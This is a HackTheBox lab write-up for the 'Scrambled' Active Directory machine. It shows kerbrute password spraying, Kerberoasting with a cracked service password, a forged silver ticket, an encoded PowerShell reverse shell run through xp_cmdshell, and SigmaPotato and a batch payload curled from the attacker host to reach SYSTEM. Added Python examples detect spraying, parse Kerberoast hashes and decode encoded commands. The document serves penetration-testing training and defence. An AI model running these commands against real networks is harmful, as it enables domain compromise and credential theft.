HackTheBox · Lab
# Scrambled
## NOTES
## ENUMERATION
### NMAP
```shell
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Scramble Corp Intranet
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-30 18:21:42Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC1.scrm.local
| Not valid before: 2024-09-04T11:14:45
|_Not valid after: 2121-06-08T22:39:53
|_ssl-date: 2025-08-30T18:24:48+00:00; 0s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC1.scrm.local
| Not valid before: 2024-09-04T11:14:45
|_Not valid after: 2121-06-08T22:39:53
|_ssl-date: 2025-08-30T18:24:48+00:00; 0s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.10.11.168:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2025-08-30T18:24:48+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-08-30T18:18:20
|_Not valid after: 2055-08-30T18:18:20
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC1.scrm.local
| Not valid before: 2024-09-04T11:14:45
|_Not valid after: 2121-06-08T22:39:53
|_ssl-date: 2025-08-30T18:24:48+00:00; 0s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2025-08-30T18:24:48+00:00; 0s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC1.scrm.local
| Not valid before: 2024-09-04T11:14:45
|_Not valid after: 2121-06-08T22:39:53
4411/tcp open found?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
| SCRAMBLECORP_ORDERS_V1.0.3;
| FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions:
| SCRAMBLECORP_ORDERS_V1.0.3;
|_ ERROR_UNKNOWN_COMMAND;
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-08-30T18:24:12
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
```
### Users found through manual web inspection (port 80)
```shell
support
ksimpson
```

## FOOTHOLD
### Valid username
```shell
❯ kerbrute userenum -d $DOMAIN --dc $IP users
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 08/30/25 - Ronnie Flathers @ropnop
2025/08/30 20:32:21 > Using KDC(s):
2025/08/30 20:32:21 > 10.10.11.168:88
2025/08/30 20:32:21 > [+] VALID USERNAME: ksimpson@scrm.local
```
### Valid username:password
```shell
❯ kerbrute passwordspray -d $DOMAIN --dc dc1.$DOMAIN users 'ksimpson'
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 08/30/25 - Ronnie Flathers @ropnop
2025/08/30 20:40:35 > Using KDC(s):
2025/08/30 20:40:35 > dc1.scrm.local:88
2025/08/30 20:40:35 > [+] VALID LOGIN: ksimpson@scrm.local:ksimpson
```
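From the defender's side, the two kerbrute steps above leave a distinctive trail on the domain controller: `userenum` sends AS-REQs for names the KDC does not know, which are audited as Event ID 4768 with result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN), and `passwordspray` produces Event ID 4771 pre-authentication failures with code 0x18 across many accounts from a single source. The Python below is an added example and not part of these notes: it runs those two heuristics over a handful of constructed, simplified event lines. The key=value rendering, the thresholds and every user name other than ksimpson, sqlsvc and support are assumptions made for the example.

```python
"""Flag Kerberos username enumeration and password spraying in DC security
events. Added example: the log lines below are constructed, not real DC output."""
import re
from collections import Counter, defaultdict

# Simplified one-line rendering of the EventData fields of 4768/4771 events.
# Real events carry many more fields; only EventID, TargetUserName, IpAddress
# and Status are needed here. IpAddress keeps the ::ffff: prefix Windows uses
# for IPv4 clients. The first five names and the 10.10.11.50 client are made up.
SAMPLE_EVENTS = """\
4768 TargetUserName=jsmith   IpAddress=::ffff:10.10.14.5 Status=0x6
4768 TargetUserName=admin2   IpAddress=::ffff:10.10.14.5 Status=0x6
4768 TargetUserName=helpdesk IpAddress=::ffff:10.10.14.5 Status=0x6
4768 TargetUserName=backup   IpAddress=::ffff:10.10.14.5 Status=0x6
4768 TargetUserName=itadmin  IpAddress=::ffff:10.10.14.5 Status=0x6
4768 TargetUserName=ksimpson IpAddress=::ffff:10.10.14.5 Status=0x0
4771 TargetUserName=ksimpson IpAddress=::ffff:10.10.14.5 Status=0x18
4771 TargetUserName=sqlsvc   IpAddress=::ffff:10.10.14.5 Status=0x18
4771 TargetUserName=support  IpAddress=::ffff:10.10.14.5 Status=0x18
4771 TargetUserName=ksimpson IpAddress=::ffff:10.10.11.50 Status=0x18
"""

EVENT_RE = re.compile(
    r"^(?P<id>\d+)\s+TargetUserName=(?P<user>\S+)\s+"
    r"IpAddress=(?:::ffff:)?(?P<src>\S+)\s+Status=(?P<code>0x[0-9a-fA-F]+)$"
)


def parse_events(text):
    """Parse the simplified lines into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if m:
            d = m.groupdict()
            d["id"] = int(d["id"])
            d["code"] = d["code"].lower()
            events.append(d)
    return events


def detect_user_enum(events, threshold=5):
    """Sources with at least `threshold` 4768 failures for unknown principals
    (0x6): the footprint of a username wordlist being thrown at the KDC."""
    unknown = Counter(e["src"] for e in events
                      if e["id"] == 4768 and e["code"] == "0x6")
    return {src: n for src, n in unknown.items() if n >= threshold}


def detect_password_spray(events, threshold=3):
    """Sources with 4771 pre-auth failures (0x18) against at least `threshold`
    distinct accounts: one password tried across many users, not one user
    mistyping a password several times."""
    accounts = defaultdict(set)
    for e in events:
        if e["id"] == 4771 and e["code"] == "0x18":
            accounts[e["src"]].add(e["user"])
    return {src: sorted(u) for src, u in accounts.items() if len(u) >= threshold}


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    print("username enumeration:", detect_user_enum(evs))
    print("password spray:", detect_password_spray(evs))
```

Both heuristics key on the source address rather than the account, because a spray spreads its failures thinly across accounts and would slip under a per-account lockout threshold. The 4768 failures require the "Audit Kerberos Authentication Service" subcategory to be enabled for failure events; the unknown-principal errors are the part of the enumeration that reliably shows up in the log.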
### Requesting a TGT with getTGT.py
```shell
getTGT.py $DOMAIN/$USER:$PASS
Impacket v0.13.0.dev0+20250721.105211.7561038 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in ksimpson.ccache
```
### Importing the ticket
```shell
export KRB5CCNAME=ksimpson.ccache
```
### Kerberoasting
```shell
GetUserSPNs.py $DOMAIN/$USER:$PASS -dc-host $HOST.$DOMAIN -k -no-pass -request
Impacket v0.13.0.dev0+20250721.105211.7561038 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName          Name    MemberOf  PasswordLastSet             LastLogon                   Delegation
----------------------------  ------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/dc1.scrm.local:1433  sqlsvc            2021-11-03 17:32:02.351452  2025-08-30 20:18:16.938878
MSSQLSvc/dc1.scrm.local       sqlsvc            2021-11-03 17:32:02.351452  2025-08-30 20:18:16.938878
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$660281197a248e6f340f90ce46f8a19a$201dddb0d302bc683881f29a6916705137217e6bb79d362cd45f68113d03ed579c0b27c197f79aae334cd97fcafb56f384bfee126428b7dd63cd0c0558cc2649afc90c03662cdd5696ef0e8b9493f213fdfacfae96ed84858d3915483a5832fe68e4c8d9e4e08baa0700f08630b27ce16aef258a32d73bc788934646052eea92f69cabab0b2e05b7fed065e6f0f425af055ce24ee299803b4c3678bbcd92d2264bb4e73921b4cc7921928001fa204b1def83ad421e646d31bc5b0779585be18ab10ab052c569746d21ea941712963a4bac1dbefea4cac62e78e592bfc091dbe557a57fe9d02fd206af238814432dc547bdfb8a1ddc6bafbde4507e536d18227d329df75f99c1d6f97309cbee692712c2ee03ff7738847aecb4f1c0e9bae5e8fdfad5b628e43aa5ae5fb0cc19de758e779dab937bee2ea8f8c1122777a28cafed411eecc142e32d5f01764668a6f309eb01c07378650af2ac09903ff264506332f58b42470c5643af51142d491acef85db2285c090c3e445d48bff57f14e3725de86bb32d5f1fde8bcac9447ef6647b173973f0bbcfca3536050f6e77b4d84b7ade44b96b92027ca8bb27f69ac019c9b05c76df39f88459fa070b2d3bf330d5b5a91f3bc44008c7454c91b72194c6738f43277a62711ad5653eee5d74a4d014c2a650ecce55bf5b03555de99437f7d33539776a023fbda5a31bd697d38312c4d8de299b8064feb1f28edebd77ed40cffc1e2f05073c47485e6a12e2300e40a2bed19816887a2c20910089f6ca0b8faf90703aa7b20dabcca7daaee099ab9dc476baa3aba7f756df2f40bed94ae663d0f2d7b40869d8704dee942d48e2ef244dfa6570a23044cdfd005f913963950584f274f4d219df43228a72cc6d87ae7a86c9e78f67678ad3d19f9f09553783d657d5ca657aac4770a6f3e77ec6377026e890bb4619a08051364b70a0e893a3a69a7b81b685730f12d40d4888b0f089a82a2ab50783df6d2871e5fd41270140ce55d06ad2cd744edc6929857ad43a76ebf1e0e71bc7699a3670804a6af16d71390d90d73220b40186c0efa61f8d7ed155c3be5bf2b65c40f70448fb61d06c4d027ca1db96021719000368c2b5a1e8a853cf58c90a5708d71add4b6701f6ece0e424bd776b07cc2747ab96a2317f6b0924a1dd142b210887aebb35be23fa5df50c031134fd4c61c12ac38e091aa2c641e31b0c497d29cf9a50ac42751202aa7c2ed5da97fb386b86d87cb351e48211552631d5934ff93cf9bdd8379eca67c98a409b71a82f50376c93f1a032ab06d65448305b4eca862258b869f77b72db81f1d4b3500b5f12b4c4c4dee7fb6d882b92be929713fceef4caa1a14ec9468a3c775399a7531def4abcc1d249ed1ae41277f2695d5478944cb83ca27e613e3dec3c9ec6fb21ec098fc94f8db02efd4c
```
### Cracked with hashcat
```shell
$krb5tgs$23$*...SNIP...2efd4c:Pegasus60
```
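The hash above is in hashcat's krb5tgs layout (mode 13100): `$krb5tgs$<etype>$*<user>$<REALM>$<spn>*$<checksum>$<encrypted ticket>`. The etype, 23, is RC4-HMAC, whose key is nothing more than the NT hash of the service account's password; that is why a wordlist candidate like Pegasus60 is recovered offline in seconds and why the fix is on the account, not on the KDC. The Python below is an added example, not part of these notes: it parses that layout and produces the summary a defender needs. The sample hash is constructed from the account, realm, SPN and checksum shown above, with the encrypted ticket cut down to its first 32 bytes.

```python
"""Parse a Kerberoast hash in hashcat's krb5tgs (mode 13100) layout and assess it.
Added example; SAMPLE_HASH is a constructed, truncated version of the one in the notes."""
import re

# Layout of hashcat mode 13100 (etype 23 only; AES hashes use a different layout):
#   $krb5tgs$23$*user$REALM$spn*$checksum$edata
KRB5TGS_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>\d+)\$\*(?P<user>[^$*]+)\$(?P<realm>[^$*]+)\$(?P<spn>[^*]+)\*"
    r"\$(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)

# Kerberos encryption type numbers (RFC 3961 / RFC 4757).
ETYPE_NAMES = {
    23: "rc4-hmac",
    17: "aes128-cts-hmac-sha1-96",
    18: "aes256-cts-hmac-sha1-96",
}

# Constructed: first 32 bytes of the encrypted part only.
SAMPLE_HASH = (
    "$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*"
    "$660281197a248e6f340f90ce46f8a19a"
    "$201dddb0d302bc683881f29a6916705137217e6bb79d362cd45f68113d03ed57"
)


def parse_krb5tgs(h):
    """Split a mode-13100 hash into its fields.
    Raises ValueError when the string is not in the etype-23 layout."""
    m = KRB5TGS_RE.match(h.strip())
    if not m:
        raise ValueError("not a $krb5tgs$ hash in the etype-23 (mode 13100) layout")
    f = m.groupdict()
    f["etype"] = int(f["etype"])
    f["checksum_bytes"] = len(f["checksum"]) // 2   # HMAC-MD5 over the ticket: 16 bytes
    f["edata_bytes"] = len(f["edata"]) // 2
    return f


def assess(h):
    """Defender-oriented summary: which account is exposed and what to change."""
    f = parse_krb5tgs(h)
    weak = f["etype"] == 23   # RC4 key == NT hash of the password: fast to crack
    return {
        "account": f["user"],
        "realm": f["realm"],
        "spn": f["spn"],
        "etype": f["etype"],
        "etype_name": ETYPE_NAMES.get(f["etype"], "unknown"),
        "offline_crackable_with_wordlist": weak,
        "mitigation": (
            "restrict msDS-SupportedEncryptionTypes on the SPN account to AES and "
            "rotate it to a long random password or a gMSA"
            if weak else
            "AES ticket: keep the service account password long and random"
        ),
    }


if __name__ == "__main__":
    for k, v in assess(SAMPLE_HASH).items():
        print(f"{k}: {v}")
```

The account is the weak link regardless of etype; AES only raises the per-guess cost. On the detection side, a 4769 event whose TicketEncryptionType is 0x17 (RC4) for an account that has an SPN is the request that produced this hash, and a burst of such requests for several SPNs from one client is the usual Kerberoasting signature.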
### Creds found:
- sqlsvc:Pegasus60
### Creds valid
```shell
[+] VALID LOGIN: sqlsvc@scrm.local:Pegasus60
```
### Redoing process for `sqlsvc` user
```shell
getTGT.py $DOMAIN/$USER:$PASS
Impacket v0.13.0.dev0+20250721.105211.7561038 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in sqlsvc.ccache
export KRB5CCNAME=sqlsvc.ccache
```
## PRIVILEGE ESCALATION
### For further escalation we forge a service ticket (silver ticket) for the MSSQL SPN with ticketer.py
```shell
ticketer.py -spn MSSQLSvc/dc1.scrm.local -user-id 500 Administrator -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain $DOMAIN
Impacket v0.13.0.dev0+20250721.105211.7561038 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for scrm.local/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache
```
### Exporting new ticket
```shell
export KRB5CCNAME=Administrator.ccache
```
### Logging into SQL
```shell
mssqlclient.py $HOST.$DOMAIN -k
Impacket v0.13.0.dev0+20250721.105211.7561038 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000)
[!] Press help for extra shell commands
SQL (SCRM\administrator dbo@master)>
```
### Revshell from MSSQL
PowerShellOneLine.ps1 (`rev.ps1`), base64-encoded as UTF-16LE for `powershell -enc`:
```shell
cat rev.ps1 | iconv -t UTF-16LE | base64 -w 0
```
(base64 output omitted)
```shell
xp_cmdshell powershell -enc JABjAGwA....SNIP....aQBlAG4A
```
```shell
nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.11.168] 59150
whoami
scrm\sqlsvc
```
```shell
PS C:\Windows\system32> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
```
### SigmaPotato.exe for exploitation (SeImpersonatePrivilege is enabled)
Create `rev.bat` with the same encoded PowerShell command as before:
```shell
powershell -enc <UTF-16LE base64 of rev.ps1>
```
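The `iconv -t UTF-16LE | base64 -w 0` pipeline exists because `powershell -enc` expects the base64 of the script's UTF-16LE bytes, not of its UTF-8 text; the `JAB...` prefix that appears whenever a script starts with `$` is the visible consequence. The same fact is what a responder relies on when an encoded command line turns up in a process-creation record (Security 4688 or Sysmon Event 1). The Python below is an added example and not part of these notes: it reproduces the encoding, pulls `-e`/`-enc`/`-EncodedCommand` arguments out of a command line and decodes them. The sample command lines are constructed; the `JABjAGwA` prefix is taken from the `xp_cmdshell` line above.

```python
"""Encode and decode PowerShell -EncodedCommand payloads for triage.
Added example; the command lines in SAMPLE_CMDLINES are constructed."""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the common
# spellings are matched here. The \b keeps -ExecutionPolicy and other -e...
# switches from matching, and the argument charset is plain base64.
ENC_ARG_RE = re.compile(
    r"-(?:e|ec|en|enc|encoded|encodedcommand)\b\s+(?P<b64>[A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)


def encode_powershell_command(script):
    """Equivalent of `iconv -t UTF-16LE | base64 -w 0` on the script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell_command(b64):
    """Reverse the encoding. An odd byte count means it was not UTF-16LE."""
    raw = base64.b64decode(b64)
    if len(raw) % 2:
        raise ValueError("decoded payload is not UTF-16LE (odd byte length)")
    return raw.decode("utf-16-le")


def extract_encoded_commands(cmdline):
    """All encoded arguments in a command line, decoded, in order of appearance."""
    return [decode_powershell_command(m.group("b64"))
            for m in ENC_ARG_RE.finditer(cmdline)]


# Constructed: what the CommandLine field of a process-creation record might hold.
SAMPLE_CMDLINES = [
    "powershell -enc " + encode_powershell_command("Write-Host 'hello'"),
    "powershell.exe -ExecutionPolicy Bypass -e " + encode_powershell_command("Get-Process"),
    "cmd.exe /c whoami",   # nothing encoded
]


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(line[:60], "->", extract_encoded_commands(line))
```

Decoding is the first step, not the last: the decoded script is often itself compressed or contains a further base64 layer, so a triage tool should loop until nothing encoded remains.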
Let’s upload both `SigmaPotato.exe` & `rev.bat`
```shell
simplehttp 80
Server will be available at:
http://10.10.14.5:80
```
```shell
PS C:\programdata> curl http://10.10.14.5:80/rev.bat -o rev.bat
PS C:\programdata> curl http://10.10.14.5:80/SigmaPotato.exe -o sp.exe
```
New listener:
```shell
nc -lnvp 4444
```
```shell
PS C:\programdata> .\sp.exe rev.bat
```
```shell
nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.11.168] 64844
PS C:\programdata> whoami
nt authority\system
```
## SYSTEM OWNAGE
```shell
nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.11.168] 64844
PS C:\programdata> whoami
nt authority\system
```
## CLEANUP
## WEB SERVICE TECHNOLOGY
## WEB
### NIKTO
### WFUZZ / GOBUSTER
### FILES
### DIRS
### SUBDIRS
### VHOSTS
## SCOPE
| IP | HOSTNAME | DOMAIN NAME | OS |
|---|---|---|---|
| 10.10.11.168 | DC1 | scrm.local | Win Serv 2019? |